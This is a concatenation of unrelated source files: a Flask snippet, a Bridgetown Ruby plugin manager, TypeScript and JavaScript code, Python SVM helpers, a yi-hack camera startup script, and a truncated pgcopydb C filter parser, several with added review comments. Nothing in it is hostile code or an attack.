# likely raise a decode error here; confirm the intended API endpoint.
data = r.json()

# extracting stock quote
# NOTE(review): assumes the JSON payload has a top-level 'price' key — verify.
stock_quote = data['price']

# creating the web service
from flask import Flask

app = Flask(__name__)

@app.route("/")
def index():
    # NOTE(review): the quote is fetched once at import time, so every request
    # returns the same stale value — confirm this is intentional.
    return stock_quote

if __name__ == "__main__":
    app.run(debug=True)
# frozen_string_literal: true
module Bridgetown
  # Loads site plugins: Gemfile-declared plugin gems (via Bundler) and local
  # plugin .rb files, and installs yarn packages declared in gem metadata.
  class PluginManager
    attr_reader :site

    # Create an instance of this class.
    #
    # site - the instance of Bridgetown::Site we're concerned with
    #
    # Returns nothing
    def initialize(site)
      @site = site
    end

    # Require all the plugins which are allowed.
    #
    # Returns nothing
    def conscientious_require
      require_plugin_files
    end

    # Requires gems in the :bridgetown_plugins Bundler group once per process
    # (guarded by BRIDGETOWN_NO_BUNDLER_REQUIRE).
    #
    # Returns true when the gems were required, false when skipped.
    def self.require_from_bundler
      if !ENV["BRIDGETOWN_NO_BUNDLER_REQUIRE"] && File.file?("Gemfile")
        require "bundler"

        Bundler.setup
        required_gems = Bundler.require(:bridgetown_plugins)
        install_yarn_dependencies(required_gems)

        message = "Required #{required_gems.map(&:name).join(", ")}"
        Bridgetown.logger.debug("PluginManager:", message)
        ENV["BRIDGETOWN_NO_BUNDLER_REQUIRE"] = "true"

        true
      else
        false
      end
    end

    # Iterates through loaded plugins and finds yarn-add gemspec metadata.
    # If that exact package hasn't been installed, execute yarn add
    #
    # Returns nothing.
    def self.install_yarn_dependencies(required_gems)
      return unless File.exist?("package.json")

      package_json = JSON.parse(File.read("package.json"))

      required_gems.each do |loaded_gem|
        next unless loaded_gem.to_spec&.metadata&.dig("yarn-add")

        # NOTE(review): splitting on "@" yields 3 parts for scoped packages
        # ("@org/pkg@1.0"), which are therefore skipped — confirm scoped
        # packages are out of scope for this metadata format.
        yarn_add_dependency = loaded_gem.to_spec.metadata["yarn-add"].split("@")
        next unless yarn_add_dependency.length == 2

        # check matching version number to see if it's already installed
        # BUG FIX: dig from the root hash so a package.json without a
        # "dependencies" key no longer raises NoMethodError on nil.
        current_package = package_json.dig("dependencies", yarn_add_dependency.first)
        next unless current_package.nil? || current_package != yarn_add_dependency.last

        # all right, time to install the package
        cmd = "yarn add #{yarn_add_dependency.join("@")}"
        system cmd
      end
    end

    # Require all .rb files
    #
    # Returns nothing.
    def require_plugin_files
      plugins_path.each do |plugin_search_path|
        plugin_files = Utils.safe_glob(plugin_search_path, File.join("**", "*.rb"))
        Bridgetown::External.require_with_graceful_fail(plugin_files)
      end
    end

    # Public: Setup the plugin search path
    #
    # Returns an Array of plugin search paths
    def plugins_path
      if site.config["plugins_dir"].eql? Bridgetown::Configuration::DEFAULTS["plugins_dir"]
        [site.in_root_dir(site.config["plugins_dir"])]
      else
        Array(site.config["plugins_dir"]).map { |d| File.expand_path(d) }
      end
    end
  end
end
|
import {Exception} from "./Exception";
/**
 * Exception raised when a supplied token fails validation.
 */
export class InvalidTokenException extends Exception {
    /**
     * @param code    error code; falls back to 'INVALID' when null/empty
     * @param message human-readable message; falls back to a default when null/empty
     * @param data    optional extra payload attached to the exception
     */
    constructor(code: string | null = null, message: string | null = null, data: any = null) {
        super();
        // `||` (not `??`) on purpose: the original contract treats an empty
        // string the same as null and substitutes the default.
        this.code = code || 'INVALID';
        this.message = message || 'Provided token is not valid';
        this.data = data;
    }
}
|
import scipy.io as sio
import numpy as np
import scipy
import matplotlib.pyplot as plt
import matplotlib as mpl
from svm import *
from svmutil import *
def get_hyper_param(y, x):
    '''
    Grid-search the best hyperparameters, C and gamma, using
    5-fold cross-validation over log2 grids.

    Args:
        y: label
        x: data

    Returns:
        C, gamma
    '''
    best_accuracy = 0
    best_c = None
    best_g = None
    for log2c in range(-1, 4):
        for log2g in range(-4, 1):
            options = f'-v 5 -c {2**log2c} -g {2**log2g} -m 300'
            accuracy = svm_train(y, x, options)
            # >= keeps the behavior of preferring later grid points on ties.
            if accuracy >= best_accuracy:
                best_accuracy = accuracy
                best_c = 2 ** log2c
                best_g = 2 ** log2g
    return best_c, best_g
def get_index(model):
    '''
    Obtain index of the max 3 and min 3 lagrange multipliers.

    Args:
        model: svm_model

    Returns:
        list[min1, min2, min3, max1, max2, max3]
    '''
    multipliers = np.asarray(model.get_sv_coef()).ravel()
    # Three smallest, then three largest (descending), by coefficient value.
    smallest = np.argsort(multipliers)[:3]
    largest = np.argsort(-multipliers)[:3]
    positions = np.concatenate((smallest, largest)).ravel().tolist()
    sv_indices = model.get_sv_indices()
    return [sv_indices[p] for p in positions]
def fix_hist_step_vertical_line_at_end(ax):
    '''
    Fix hist step vertical line at end for axes `ax`.
    '''
    # Drop the final vertex of every Polygon child, which removes the
    # spurious closing vertical segment of a step histogram.
    for child in ax.get_children():
        if isinstance(child, mpl.patches.Polygon):
            child.set_xy(child.get_xy()[:-1])
def plot_cdf(y, x, model, c, digit, g=None):
    '''
    Plot and save the cumulative distribution of functional margins
    (y_i * decision_value_i) for the given trained model.

    Args:
        y: label
        x: data
        model: trained svm_model
        c: C hyperparameter (used in the title and filename)
        digit: digit class being plotted
        g: optional gamma hyperparameter (included in title/filename if given)
    '''
    n_bins = 10000
    _, _, dec_val = svm_predict(y, x, model)
    fig, ax = plt.subplots()
    # Functional margin of each sample.
    margin = np.multiply(np.array(dec_val).ravel(), y)
    plt.hist(margin, n_bins, density=True, histtype='step', cumulative=True)
    plt.ylim(top=1)
    plt.xlabel('Margin')
    plt.ylabel('Cumulative Distribution Function')
    # PEP 8: compare to None with `is not None` (was `!= None`); build the
    # title and output filename in a single branch to avoid duplication.
    if g is not None:
        plt.title(f'Digit: {digit} (c={c}, g={g})')
        out_path = f'img/c_{c}_g_{g}_digit_{digit}_cdf.png'
    else:
        plt.title(f'Digit: {digit} (c={c})')
        out_path = f'img/c_{c}_digit_{digit}_cdf.png'
    fix_hist_step_vertical_line_at_end(ax)
    plt.savefig(out_path)
    plt.close(fig)
|
const assert = require('assert');
const flatstr = require('flatstr');
const hook = require('../../../src/custom/cappasity-info-post');
// Fixture: minimal file record passed through the hook.
const file = {
  uploadId: 'f1c9d940-35bf-44f7-9134-89bee51d0ee3',
  uploadType: 'simple',
  c_ver: '4.0.0',
  packed: false,
  status: '3',
};

describe('cappasity-info-post hook test suite', function suite() {
  beforeEach('add stubs', function stubs() {
    // The hook is bound to a context providing the API domain it embeds
    // into the generated player URL.
    this.config = {
      apiDomain: 'api.cappasity.com',
    };
    this.boundHook = hook.bind(this);
  });

  describe('get embedded info', function modelSuite() {
    it('should be able to set embed code', function test() {
      const embeddedFile = this.boundHook(file);
      assert.ok(embeddedFile.embed);

      // Expected iframe attributes; whitespace in the template is normalized
      // to single spaces below, so only token order/content matters.
      const expectedAttrs = flatstr(`
        allowfullscreen
        mozallowfullscreen="true"
        webkitallowfullscreen="true"
        width="{{ width }}"
        height="{{ height }}"
        frameborder="0"
        style="border:0;"
        src="https://api.cappasity.com/api/player/f1c9d940-35bf-44f7-9134-89bee51d0ee3/`
        + 'embedded?autorun={{ autorun }}&closebutton={{ closebutton }}&logo={{ logo }}'
        + '&analytics={{ analytics }}&uipadx={{ uipadx }}&uipady={{ uipady }}'
        + '&enablestoreurl={{ enablestoreurl }}&storeurl={{ storeurl }}&hidehints={{ hidehints }}'
        + '&language={{ language }}&autorotate={{ autorotate }}&autorotatetime={{ autorotatetime }}'
        + '&autorotatedelay={{ autorotatedelay }}&autorotatedir={{ autorotatedir }}'
        + '&hidefullscreen={{ hidefullscreen }}&hideautorotateopt={{ hideautorotateopt }}'
        + '&hidesettingsbtn={{ hidesettingsbtn }}"')
        .replace(/\s+/g, ' ')
        .trim();

      assert.equal(embeddedFile.embed.code, `<iframe ${expectedAttrs}></iframe>`);
    });
  });
});
|
#!/bin/sh
# Startup configuration for the yi-hack camera firmware mod.
# Paths and identity of the yi-hack installation on the SD card.
CONF_FILE="etc/system.conf"
YI_HACK_PREFIX="/tmp/sd/yi-hack"
YI_HACK_UPGRADE_PATH="/tmp/sd/.fw_upgrade"
YI_HACK_VER=$(cat /tmp/sd/yi-hack/version)
MODEL_SUFFIX=$(cat /tmp/sd/yi-hack/model_suffix)
# Look up a key in the system config file and print its value.
# $1 - config key; output is everything after the first "=" on the matching line.
get_config()
{
    key="$1"
    # FIX: quote the key and the path, and use the assigned variable;
    # the unquoted "$1" was vulnerable to word splitting/globbing.
    grep -w "$key" "$YI_HACK_PREFIX/$CONF_FILE" | cut -d "=" -f2
}
start_buffer()
{
    # Trick to start circular buffer filling
    ./cloud &
    # Poll field 8 of the first hexdump line of the shared frame buffer until
    # it changes from 0000 (i.e. frames start arriving) or ~12 s elapse.
    IDX=`hexdump -n 16 /dev/shm/fshare_frame_buf | awk 'NR==1{print $8}'`
    N=0
    # NOTE(review): `-eq` is a numeric comparison but hexdump prints hex words,
    # which may be non-decimal — confirm this field is always numeric here.
    while [ "$IDX" -eq "0000" ] && [ $N -lt 60 ]; do
        IDX=`hexdump -n 16 /dev/shm/fshare_frame_buf | awk 'NR==1{print $8}'`
        N=$(($N+1))
        sleep 0.2
    done
    # Stop the helper once the buffer is live.
    killall cloud
    ipc_cmd -x
}
# Make the hack's binaries take effect alongside the stock firmware paths.
export PATH=/usr/bin:/usr/sbin:/bin:/sbin:/home/base/tools:/home/app/localbin:/home/base:/tmp/sd/yi-hack/bin:/tmp/sd/yi-hack/sbin:/tmp/sd/yi-hack/usr/bin:/tmp/sd/yi-hack/usr/sbin
export LD_LIBRARY_PATH=/lib:/usr/lib:/home/lib:/home/qigan/lib:/home/app/locallib:/tmp/sd:/tmp/sd/gdb:/tmp/sd/yi-hack/lib
ulimit -s 1024

# Remove core files, if any
rm -f $YI_HACK_PREFIX/bin/core
rm -f $YI_HACK_PREFIX/www/cgi-bin/core
touch /tmp/httpd.conf

# If a firmware upgrade was staged, generate and run a second-phase script
# that copies the staged files over, cleans up and reboots — then exit.
if [ -f $YI_HACK_UPGRADE_PATH/yi-hack/fw_upgrade_in_progress ]; then
    echo "#!/bin/sh" > /tmp/fw_upgrade_2p.sh
    echo "# Complete fw upgrade and restore configuration" >> /tmp/fw_upgrade_2p.sh
    echo "sleep 1" >> /tmp/fw_upgrade_2p.sh
    echo "cd $YI_HACK_UPGRADE_PATH" >> /tmp/fw_upgrade_2p.sh
    echo "cp -rf * .." >> /tmp/fw_upgrade_2p.sh
    echo "cd .." >> /tmp/fw_upgrade_2p.sh
    echo "rm -rf $YI_HACK_UPGRADE_PATH" >> /tmp/fw_upgrade_2p.sh
    echo "rm $YI_HACK_PREFIX/fw_upgrade_in_progress" >> /tmp/fw_upgrade_2p.sh
    echo "sync" >> /tmp/fw_upgrade_2p.sh
    echo "sync" >> /tmp/fw_upgrade_2p.sh
    echo "sync" >> /tmp/fw_upgrade_2p.sh
    echo "reboot" >> /tmp/fw_upgrade_2p.sh
    sh /tmp/fw_upgrade_2p.sh
    exit
fi

$YI_HACK_PREFIX/script/check_conf.sh

hostname -F $YI_HACK_PREFIX/etc/hostname

export TZ=$(get_config TIMEZONE)

# Optionally create/enable a 64 MB swap file on the SD card.
if [[ $(get_config SWAP_FILE) == "yes" ]] ; then
    SD_PRESENT=$(mount | grep mmc | grep -c ^)
    if [[ $SD_PRESENT -eq 1 ]]; then
        if [[ -f /tmp/sd/swapfile ]]; then
            swapon /tmp/sd/swapfile
        else
            dd if=/dev/zero of=/tmp/sd/swapfile bs=1M count=64
            chmod 0600 /tmp/sd/swapfile
            mkswap /tmp/sd/swapfile
            swapon /tmp/sd/swapfile
        fi
    fi
fi

# If a web username is configured, enable HTTP basic auth for httpd and ONVIF.
if [[ x$(get_config USERNAME) != "x" ]] ; then
    USERNAME=$(get_config USERNAME)
    PASSWORD=$(get_config PASSWORD)
    ONVIF_USERPWD="--user $USERNAME --password $PASSWORD"
    echo "/:$USERNAME:$PASSWORD" > /tmp/httpd.conf
fi

# If an SSH password is configured, set the root password hash in bind-mounted
# copies of /etc/passwd and /etc/shadow (the rootfs is read-only).
if [[ x$(get_config SSH_PASSWORD) != "x" ]] ; then
    SSH_PASSWORD=$(get_config SSH_PASSWORD)
    PASSWORD_MD5="$(echo "${SSH_PASSWORD}" | mkpasswd --method=MD5 --stdin)"
    cp -f "/etc/passwd" "/tmp/sd/yi-hack/etc/passwd"
    sed -i 's|^root::|root:'${PASSWORD_MD5}':|g' "/tmp/sd/yi-hack/etc/passwd"
    sed -i 's|/root|/tmp/sd/yi-hack|g' "/tmp/sd/yi-hack/etc/passwd"
    mount --bind "/tmp/sd/yi-hack/etc/passwd" "/etc/passwd"
    cp -f "/etc/shadow" "/tmp/sd/yi-hack/etc/shadow"
    sed -i 's|^root::|root:'${PASSWORD_MD5}':|g' "/tmp/sd/yi-hack/etc/shadow"
    mount --bind "/tmp/sd/yi-hack/etc/shadow" "/etc/shadow"
fi

# Validate configured ports, falling back to defaults on non-numeric values.
case $(get_config RTSP_PORT) in
    ''|*[!0-9]*) RTSP_PORT=554 ;;
    *) RTSP_PORT=$(get_config RTSP_PORT) ;;
esac
case $(get_config ONVIF_PORT) in
    ''|*[!0-9]*) ONVIF_PORT=80 ;;
    *) ONVIF_PORT=$(get_config ONVIF_PORT) ;;
esac
case $(get_config HTTPD_PORT) in
    ''|*[!0-9]*) HTTPD_PORT=8080 ;;
    *) HTTPD_PORT=$(get_config HTTPD_PORT) ;;
esac

# todo
#if [ ! -f $YI_PREFIX/cloudAPI_real ]; then
#    mv $YI_PREFIX/cloudAPI $YI_PREFIX/cloudAPI_real
#    cp $YI_HACK_PREFIX/script/cloudAPI $YI_PREFIX/
#fi

# Start the stock camera processes; with the cloud disabled, only the local
# buffer is primed and the cloud API host is redirected to localhost.
if [[ $(get_config DISABLE_CLOUD) == "no" ]] ; then
    (
        if [ $(get_config RTSP_AUDIO) != "no" ]; then
            touch /tmp/audio_fifo.requested
        fi
        if [ $(get_config SPEAKER_AUDIO) != "no" ]; then
            touch /tmp/audio_in_fifo.requested
        fi
        cd /home/app
        LD_LIBRARY_PATH="/tmp/sd/yi-hack/lib:/lib:/usr/lib:/home/lib:/home/qigan/lib:/home/app/locallib:/tmp/sd:/tmp/sd/gdb" ./rmm &
        sleep 6
        dd if=/tmp/audio_fifo of=/dev/null bs=1 count=8192
#        dd if=/dev/zero of=/tmp/audio_in_fifo bs=1 count=1024
        ./mp4record &
        ./cloud &
        ./p2p_tnp &
        ./oss &
        if [ -f ./oss_fast ]; then
            ./oss_fast &
        fi
        if [ -f ./oss_lapse ]; then
            ./oss_lapse &
        fi
        ./rtmp &
        ./watch_process &
    )
else
    (
        if [ $(get_config RTSP_AUDIO) != "no" ]; then
            touch /tmp/audio_fifo.requested
        fi
        if [ $(get_config SPEAKER_AUDIO) != "no" ]; then
            touch /tmp/audio_in_fifo.requested
        fi
        cd /home/app
        LD_LIBRARY_PATH="/tmp/sd/yi-hack/lib:/lib:/usr/lib:/home/lib:/home/qigan/lib:/home/app/locallib:/tmp/sd:/tmp/sd/gdb" ./rmm &
        sleep 6
        dd if=/tmp/audio_fifo of=/dev/null bs=1 count=8192
#        dd if=/dev/zero of=/tmp/audio_in_fifo bs=1 count=1024
        # Trick to start circular buffer filling
        start_buffer
        if [[ $(get_config REC_WITHOUT_CLOUD) == "yes" ]] ; then
            ./mp4record &
        fi
        # Redirect the cloud API host to localhost via a writable /etc copy.
        mkdir /tmp/etc
        cp -R /etc/* /tmp/etc
        mount --bind /tmp/etc /etc
        echo "127.0.0.1 api.eu.xiaoyi.com" >> /etc/hosts
    )
fi

# Optional services: web UI, telnet, FTP, SSH, NTP.
if [[ $(get_config HTTPD) == "yes" ]] ; then
    mkdir -p /tmp/sd/record
    mkdir -p /tmp/sd/yi-hack/www/record
    mount --bind /tmp/sd/record /tmp/sd/yi-hack/www/record
    httpd -p $HTTPD_PORT -h $YI_HACK_PREFIX/www/ -c /tmp/httpd.conf
fi

if [[ $(get_config TELNETD) == "no" ]] ; then
    killall telnetd
fi

if [[ $(get_config FTPD) == "yes" ]] ; then
    if [[ $(get_config BUSYBOX_FTPD) == "yes" ]] ; then
        tcpsvd -vE 0.0.0.0 21 ftpd -w &
    else
        pure-ftpd -B
    fi
fi

if [[ $(get_config SSHD) == "yes" ]] ; then
    mkdir -p $YI_HACK_PREFIX/etc/dropbear
    if [ ! -f $YI_HACK_PREFIX/etc/dropbear/dropbear_ecdsa_host_key ]; then
        dropbearkey -t ecdsa -f /tmp/dropbear_ecdsa_host_key
        mv /tmp/dropbear_ecdsa_host_key $YI_HACK_PREFIX/etc/dropbear/
    fi
    # Restore keys
    # mkdir -p /etc/dropbear
    # cp -f $SONOFF_HACK_PREFIX/etc/dropbear/* /etc/dropbear/
    chmod 0600 $YI_HACK_PREFIX/etc/dropbear/*
    dropbear -R -B
fi

if [[ $(get_config NTPD) == "yes" ]] ; then
    # Wait until all the other processes have been initialized
    sleep 5 && ntpd -p $(get_config NTP_SERVER) &
fi

ipc_multiplexer &
sleep 1

if [[ $(get_config MQTT) == "yes" ]] ; then
    mqttv4 &
    mqtt-config &
fi

sleep 5

# Build ":port" display suffixes, empty for default ports.
if [[ $RTSP_PORT != "554" ]] ; then
    D_RTSP_PORT=:$RTSP_PORT
fi

if [[ $HTTPD_PORT != "80" ]] ; then
    D_HTTPD_PORT=:$HTTPD_PORT
fi

if [[ $ONVIF_PORT != "80" ]] ; then
    D_ONVIF_PORT=:$ONVIF_PORT
fi

if [[ $(get_config ONVIF_WM_SNAPSHOT) == "yes" ]] ; then
    WATERMARK="&watermark=yes"
fi

# Start the RTSP server and prepare ONVIF profiles for the selected streams.
if [[ $(get_config RTSP) == "yes" ]] ; then
    RTSP_AUDIO_COMPRESSION=$(get_config RTSP_AUDIO)
    if [[ "$RTSP_AUDIO_COMPRESSION" == "none" ]] ; then
        RTSP_AUDIO_COMPRESSION="no"
    fi
    RRTSP_MODEL=$MODEL_SUFFIX RRTSP_RES=$(get_config RTSP_STREAM) RRTSP_AUDIO=$RTSP_AUDIO_COMPRESSION RRTSP_PORT=$RTSP_PORT RRTSP_USER=$USERNAME RRTSP_PWD=$PASSWORD rRTSPServer &
    if [[ $(get_config RTSP_STREAM) == "low" ]]; then
        ONVIF_PROFILE_1="--name Profile_1 --width 640 --height 360 --url rtsp://%s$D_RTSP_PORT/ch0_1.h264 --snapurl http://%s$D_HTTPD_PORT/cgi-bin/snapshot.sh?res=low$WATERMARK --type H264"
    fi
    if [[ $(get_config RTSP_STREAM) == "high" ]]; then
        ONVIF_PROFILE_0="--name Profile_0 --width 1920 --height 1080 --url rtsp://%s$D_RTSP_PORT/ch0_0.h264 --snapurl http://%s$D_HTTPD_PORT/cgi-bin/snapshot.sh?res=high$WATERMARK --type H264"
    fi
    if [[ $(get_config RTSP_STREAM) == "both" ]]; then
        if [[ $(get_config ONVIF_PROFILE) == "low" ]] || [[ $(get_config ONVIF_PROFILE) == "both" ]] ; then
            ONVIF_PROFILE_1="--name Profile_1 --width 640 --height 360 --url rtsp://%s$D_RTSP_PORT/ch0_1.h264 --snapurl http://%s$D_HTTPD_PORT/cgi-bin/snapshot.sh?res=low$WATERMARK --type H264"
        fi
        if [[ $(get_config ONVIF_PROFILE) == "high" ]] || [[ $(get_config ONVIF_PROFILE) == "both" ]] ; then
            ONVIF_PROFILE_0="--name Profile_0 --width 1920 --height 1080 --url rtsp://%s$D_RTSP_PORT/ch0_0.h264 --snapurl http://%s$D_HTTPD_PORT/cgi-bin/snapshot.sh?res=high$WATERMARK --type H264"
        fi
    fi
    $YI_HACK_PREFIX/script/wd_rtsp.sh &
fi

# Device identity extracted from the memory-mapped info block.
# NOTE(review): offsets 656/592 are model-specific — confirm per camera model.
SERIAL_NUMBER=$(dd bs=1 count=20 skip=656 if=/tmp/mmap.info 2>/dev/null | cut -c1-20)
HW_ID=$(dd bs=1 count=4 skip=592 if=/tmp/mmap.info 2>/dev/null | cut -c1-4)

if [[ $(get_config ONVIF) == "yes" ]] ; then
    if [[ $(get_config ONVIF_NETIF) == "wlan0" ]] ; then
        ONVIF_NETIF="wlan0"
    else
        ONVIF_NETIF="eth0"
    fi
    # PTZ-capable models get extra move/preset hooks wired to ipc_cmd.
    if [[ $MODEL_SUFFIX == "r30gb" ]] || [[ $MODEL_SUFFIX == "h52ga" ]] || [[ $MODEL_SUFFIX == "h51ga" ]] || [[ $MODEL_SUFFIX == "q321br_lsx" ]] ; then
        onvif_srvd --pid_file /var/run/onvif_srvd.pid --model "Yi Hack" --manufacturer "Yi" --firmware_ver "$YI_HACK_VER" --hardware_id $HW_ID --serial_num $SERIAL_NUMBER --ifs $ONVIF_NETIF --port $ONVIF_PORT --scope onvif://www.onvif.org/Profile/S $ONVIF_PROFILE_0 $ONVIF_PROFILE_1 $ONVIF_USERPWD --ptz --move_left "/tmp/sd/yi-hack/bin/ipc_cmd -M left" --move_right "/tmp/sd/yi-hack/bin/ipc_cmd -M right" --move_up "/tmp/sd/yi-hack/bin/ipc_cmd -M up" --move_down "/tmp/sd/yi-hack/bin/ipc_cmd -M down" --move_stop "/tmp/sd/yi-hack/bin/ipc_cmd -M stop" --move_preset "/tmp/sd/yi-hack/bin/ipc_cmd -p %t"
    else
        onvif_srvd --pid_file /var/run/onvif_srvd.pid --model "Yi Hack" --manufacturer "Yi" --firmware_ver "$YI_HACK_VER" --hardware_id $HW_ID --serial_num $SERIAL_NUMBER --ifs $ONVIF_NETIF --port $ONVIF_PORT --scope onvif://www.onvif.org/Profile/S $ONVIF_PROFILE_0 $ONVIF_PROFILE_1 $ONVIF_USERPWD
    fi
    if [[ $(get_config ONVIF_WSDD) == "yes" ]] ; then
        wsdd --pid_file /var/run/wsdd.pid --if_name $ONVIF_NETIF --type tdn:NetworkVideoTransmitter --xaddr http://%s$D_ONVIF_PORT --scope "onvif://www.onvif.org/name/Unknown onvif://www.onvif.org/Profile/Streaming"
    fi
fi

framefinder $MODEL_SUFFIX &

# Add crontab
CRONTAB=$(get_config CRONTAB)
FREE_SPACE=$(get_config FREE_SPACE)
mkdir -p /var/spool/cron/crontabs/
if [ ! -z "$CRONTAB" ]; then
    echo "$CRONTAB" > /var/spool/cron/crontabs/root
fi
# Hourly cleanup job keeps at least FREE_SPACE available for recordings.
if [ "$FREE_SPACE" != "0" ]; then
    echo "0 * * * * /tmp/sd/yi-hack/script/clean_records.sh $FREE_SPACE" >> /var/spool/cron/crontabs/root
fi
$YI_HACK_PREFIX/usr/sbin/crond -c /var/spool/cron/crontabs/

# Add MQTT Advertise
if [ -f "$YI_HACK_PREFIX/script/mqtt_advertise/startup.sh" ]; then
    $YI_HACK_PREFIX/script/mqtt_advertise/startup.sh
fi

# Remove log files written to SD on boot containing the WiFi password
#rm -f "/tmp/sd/log/log_first_login.tar.gz"
#rm -f "/tmp/sd/log/log_login.tar.gz"
#rm -f "/tmp/sd/log/log_p2p_clr.tar.gz"
#rm -f "/tmp/sd/log/log_wifi_connected.tar.gz"

if [[ $(get_config FTP_UPLOAD) == "yes" ]] ; then
    /tmp/sd/yi-hack/script/ftppush.sh start &
fi

# Finally run the user-provided startup hook, if present.
if [ -f "/tmp/sd/yi-hack/startup.sh" ]; then
    /tmp/sd/yi-hack/startup.sh
fi
|
#! /bin/bash
# Fetch the BiomarkerBenchmark archive (version 4) from OSF via the shared download helper.
bash ../Helper/BiomarkerBenchmark/download.sh "https://osf.io/k4sng/download?version=4"
|
<gh_stars>1-10
/*
* src/bin/pgcopydb/filtering.c
* Implementation of a CLI which lets you run individual routines
* directly
*/
#include <errno.h>
#include <getopt.h>
#include <inttypes.h>
#include "env_utils.h"
#include "ini.h"
#include "log.h"
#include "filtering.h"
#include "parsing.h"
#include "string_utils.h"
static bool parse_filter_quoted_table_name(SourceFilterTable *table,
const char *qname);
/*
 * filterTypeToString returns a string representation of the enum value.
 * The string returned for each case is the enum identifier itself, so it
 * can be used verbatim in debug logs.
 */
char *
filterTypeToString(SourceFilterType type)
{
	switch (type)
	{
		case SOURCE_FILTER_TYPE_NONE:
		{
			return "SOURCE_FILTER_TYPE_NONE";
		}

		case SOURCE_FILTER_TYPE_INCL:
		{
			return "SOURCE_FILTER_TYPE_INCL";
		}

		case SOURCE_FILTER_TYPE_EXCL:
		{
			return "SOURCE_FILTER_TYPE_EXCL";
		}

		case SOURCE_FILTER_TYPE_LIST_NOT_INCL:
		{
			return "SOURCE_FILTER_TYPE_LIST_NOT_INCL";
		}

		case SOURCE_FILTER_TYPE_LIST_EXCL:
		{
			/* fixed: used to return "SOURCE_FILTER_LIST_EXCL" (missing TYPE_),
			 * inconsistent with every other case and with the enum name */
			return "SOURCE_FILTER_TYPE_LIST_EXCL";
		}

		case SOURCE_FILTER_TYPE_EXCL_INDEX:
		{
			return "SOURCE_FILTER_TYPE_EXCL_INDEX";
		}

		case SOURCE_FILTER_TYPE_LIST_EXCL_INDEX:
		{
			return "SOURCE_FILTER_TYPE_LIST_EXCL_INDEX";
		}
	}

	/* that's a bug, the lack of a default branch above should prevent it */
	return "SOURCE FILTER TYPE UNKNOWN";
}
/*
 * filterTypeComplement returns the complement of the given filtering type:
 * instead of listing the include-only tables, list the tables that are not
 * included; instead of listing tables that are not excluded, list the tables
 * that are excluded.  Types without a complement map to NONE.
 */
SourceFilterType
filterTypeComplement(SourceFilterType type)
{
	switch (type)
	{
		/* include-only <-> not-included */
		case SOURCE_FILTER_TYPE_INCL:
			return SOURCE_FILTER_TYPE_LIST_NOT_INCL;

		case SOURCE_FILTER_TYPE_LIST_NOT_INCL:
			return SOURCE_FILTER_TYPE_INCL;

		/* excluded <-> not-excluded */
		case SOURCE_FILTER_TYPE_EXCL:
			return SOURCE_FILTER_TYPE_LIST_EXCL;

		case SOURCE_FILTER_TYPE_LIST_EXCL:
			return SOURCE_FILTER_TYPE_EXCL;

		/* excluded index <-> not-excluded index */
		case SOURCE_FILTER_TYPE_EXCL_INDEX:
			return SOURCE_FILTER_TYPE_LIST_EXCL_INDEX;

		case SOURCE_FILTER_TYPE_LIST_EXCL_INDEX:
			return SOURCE_FILTER_TYPE_EXCL_INDEX;

		default:
			return SOURCE_FILTER_TYPE_NONE;
	}
}
/*
 * parse_filters parses the given INI-style filter file into the SourceFilters
 * structure: one section per kind of filter (exclude-schema, exclude-table,
 * exclude-table-data, exclude-index, include-only-table).  Returns false on
 * read/parse errors or on an inconsistent filter combination.
 */
bool
parse_filters(const char *filename, SourceFilters *filters)
{
	char *fileContents = NULL;
	long fileSize = 0L;

	/* read the whole filter file in memory */
	if (!read_file(filename, &fileContents, &fileSize))
	{
		return false;
	}

	ini_t *ini = ini_load(fileContents, NULL);

	/* ini_load keeps its own copy; the raw buffer is no longer needed */
	free(fileContents);

	/*
	 * The index in the sections array matches the SourceFilterSection enum
	 * values.
	 */
	struct section
	{
		char name[NAMEDATALEN];
		SourceFilterTableList *list;
	};

	/* exclude-schema has no table list: it fills excludeSchemaList instead */
	struct section sections[] = {
		{ "exclude-schema", NULL },
		{ "exclude-table", &(filters->excludeTableList) },
		{ "exclude-table-data", &(filters->excludeTableDataList) },
		{ "exclude-index", &(filters->excludeIndexList) },
		{ "include-only-table", &(filters->includeOnlyTableList) },
		{ "", NULL },
	};

	for (int i = 0; sections[i].name[0] != '\0'; i++)
	{
		char *sectionName = sections[i].name;
		int sectionIndex = ini_find_section(ini, sectionName, 0);

		if (sectionIndex == INI_NOT_FOUND)
		{
			log_debug("Sections \"%s\" not found", sectionName);
			continue;
		}

		if (strcmp(ini_section_name(ini, sectionIndex), sectionName) != 0)
		{
			/* skip prefix match, only accept full length match */
			continue;
		}

		int optionCount = ini_property_count(ini, sectionIndex);

		log_debug("Section \"%s\" has %d entries", sections[i].name, optionCount);

		if (optionCount <= 0)
		{
			continue;
		}

		/*
		 * The index in the sections table is a SourceFilterSection enum value.
		 */
		switch (i)
		{
			case SOURCE_FILTER_EXCLUDE_SCHEMA:
			{
				/* NOTE(review): malloc result is not checked here -- confirm
				 * whether out-of-memory is handled elsewhere */
				filters->excludeSchemaList.count = optionCount;
				filters->excludeSchemaList.array = (SourceFilterSchema *)
					malloc(optionCount *
						   sizeof(SourceFilterSchema));

				for (int o = 0; o < optionCount; o++)
				{
					SourceFilterSchema *schema =
						&(filters->excludeSchemaList.array[o]);

					const char *optionName =
						ini_property_name(ini, sectionIndex, o);

					strlcpy(schema->nspname, optionName, sizeof(schema->nspname));

					log_debug("excluding schema \"%s\"", schema->nspname);
				}

				break;
			}

			case SOURCE_FILTER_EXCLUDE_TABLE:
			case SOURCE_FILTER_EXCLUDE_TABLE_DATA:
			case SOURCE_FILTER_EXCLUDE_INDEX:
			case SOURCE_FILTER_INCLUDE_ONLY_TABLE:
			{
				/* all four table-name sections share the same parsing code */
				SourceFilterTableList *list = sections[i].list;

				list->count = optionCount;
				list->array = (SourceFilterTable *)
					malloc(optionCount * sizeof(SourceFilterTable));

				for (int o = 0; o < optionCount; o++)
				{
					SourceFilterTable *table = &(list->array[o]);

					const char *optionName =
						ini_property_name(ini, sectionIndex, o);

					if (!parse_filter_quoted_table_name(table, optionName))
					{
						/* errors have already been logged */
						(void) ini_destroy(ini);
						return false;
					}

					log_trace("%s \"%s\".\"%s\"",
							  sections[i].name,
							  table->nspname,
							  table->relname);
				}

				break;
			}

			default:
			{
				log_error("BUG: unknown section number %d", i);
				(void) ini_destroy(ini);
				return false;
			}
		}
	}

	(void) ini_destroy(ini);

	/*
	 * Now implement some checks: we can't implement both include-only-table
	 * and any other filtering rule, which are exclusion rules. Otherwise it's
	 * unclear what to do with tables that are not excluded and not included
	 * either.
	 */
	if (filters->includeOnlyTableList.count > 0 &&
		(filters->excludeTableList.count > 0 ||
